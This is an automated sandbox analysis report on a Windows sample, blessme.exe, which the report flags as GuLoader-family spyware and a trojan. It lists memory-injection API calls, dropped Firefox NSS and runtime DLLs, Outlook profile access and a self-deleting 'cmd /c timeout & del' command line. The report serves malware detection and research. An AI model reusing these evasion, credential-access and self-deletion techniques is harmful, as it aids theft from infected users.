            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0216183F NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166C24 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162425 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162C5E NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166C4E NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0216649C NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0216288E NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166CA6 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021658A7 NtSetInformationThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166CD9 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021668C0 NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021664C9 NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021628EC NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02160527 NtSetInformationThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0216052B NtSetInformationThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162953 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166D4F NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0216057B NtSetInformationThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166963 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166989 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166DA7 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021605DF NtSetInformationThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021629C4 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021629FE NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021669E3 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_00403283
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_00403442
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_00403642
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0040340A
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0040341C
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_00403432
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_004034C7
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_004034D5
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_004034DD
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_00403490
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_00403541
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0040354A
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_00403523
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_004035A4
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_0009786F
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_000A9877
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_0009C096
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_00082142
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_000779A9
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_000772D4
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_00076B56
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_000AAB76
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_00098527
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_000707BD
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_000A739B
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 1_3_000A16AD
            Source: blessme.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
            Source: blessme.exe, 00000000.00000002.249988232.0000000000414000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: blessme.exe | Binary or memory string: OriginalFilename vs blessme.exe
            Source: blessme.exe, 00000001.00000002.304127829.000000001E2D0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs blessme.exe
            Source: blessme.exe, 00000001.00000002.304127829.000000001E2D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs blessme.exe
            Source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameapisetstubj% vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamesoftokn3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsvcp140.dll^ vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenssdbm3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000002.300411735.0000000000150000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefreebl3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dll^ vs blessme.exe
            Source: blessme.exe, 00000001.00000002.303967664.000000001DEF0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs blessme.exe
            Source: blessme.exe, 00000001.00000000.249182572.0000000000414000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: blessme.exe, 00000001.00000002.303902579.000000001DDA0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs blessme.exe
            Source: blessme.exe | Binary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: C:\Users\user\Desktop\blessme.exe | Section loaded: crtdll.dll
            Source: blessme.exe, 00000001.00000003.300350315.00000000009A2000.00000004.00000001.sdmp | Binary or memory string: ;.EXE;.BAT;.CMD;.VBS;.VBp4M>.
            Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@8/49@3/1
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_01
            Source: C:\Users\user\Desktop\blessme.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7566F0FB-D3CBFD3E-5B364EF2
            Source: C:\Users\user\Desktop\blessme.exe | File created: C:\Users\user\AppData\Local\Temp\~DFA461284CB6D9ECB5.TMP
            Source: blessme.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\blessme.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\Desktop\blessme.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\blessme.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\blessme.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: blessme.exe, nss3.dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: blessme.exe, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: blessme.exe, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: blessme.exe, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: blessme.exe, nss3.dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: blessme.exe, nss3.dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: blessme.exe, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: blessme.exe Virustotal: Detection: 36%
            Source: blessme.exe ReversingLabs: Detection: 33%
            Source: unknown Process created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe'
            Source: unknown Process created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe'
            Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'blessme.exe'
            Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: C:\Users\user\Desktop\blessme.exe Process created: C:\Users\user\Desktop\blessme.exe 'C:\Users\user\Desktop\blessme.exe'
            Source: C:\Users\user\Desktop\blessme.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'blessme.exe'
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\blessme.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293814970.000000001ECEC000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: blessme.exe, nss3.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: blessme.exe, 00000001.00000003.289023195.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287786160.000000001F08C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287415548.000000001F090000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293794952.000000001ECD0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: blessme.exe, 00000001.00000003.286648562.000000001F09C000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: blessme.exe, 00000001.00000003.287415548.000000001F090000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: blessme.exe, 00000001.00000003.292440366.000000001F99C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293768396.000000001ECC0000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287278977.000000001F08C000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293794952.000000001ECD0000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: blessme.exe, 00000001.00000003.289023195.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara match, File source: 00000001.00000002.300469829.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: blessme.exe PID: 5456, type: MEMORY
            Source: Yara match, File source: Process Memory Space: blessme.exe PID: 4396, type: MEMORY
            Binary contains a suspicious time stamp
            Source: initial sample, Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Yara detected VB6 Downloader Generic
            Source: Yara match, File source: Process Memory Space: blessme.exe PID: 5456, type: MEMORY
            Source: Yara match, File source: Process Memory Space: blessme.exe PID: 4396, type: MEMORY
            Source: blessme.exe, Static PE information: real checksum: 0x2ec58 should be: 0x2dcdc
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 0_2_00404421 push ebx; retf 0_2_00404427
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 0_2_00405C24 push esi; retf 0_2_00405C6F
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 0_2_004056CA push ebx; retf 0_2_004056CB
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 0_2_00405513 push edx; iretd 0_2_0040557C
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 0_2_0040552C push edx; iretd 0_2_0040557C
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 0_2_00406DA2 push cs; retf 0_2_00406DA3
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 0_2_00403DA9 push 0000000Fh; iretd 0_2_00403DBB
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 0_2_021661A0 push eax; ret 0_2_021661C6
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 1_3_1E0CA73E push ecx; iretd 1_3_1E0CA73F
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 1_3_1E0CA4B8 push esi; iretd 1_3_1E0CA4BB
            Source: C:\Users\user\Desktop\blessme.exe, Code function: 1_3_1E0C96EF push cs; retf 1_3_1E0C96F1
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-datetime-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-file-l2-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\softokn3.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-console-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-conio-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-environment-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-libraryloader-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-multibyte-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-processthreads-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-locale-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-utility-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\nssdbm3.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-handle-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-rtlsupport-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-file-l1-2-0.dll
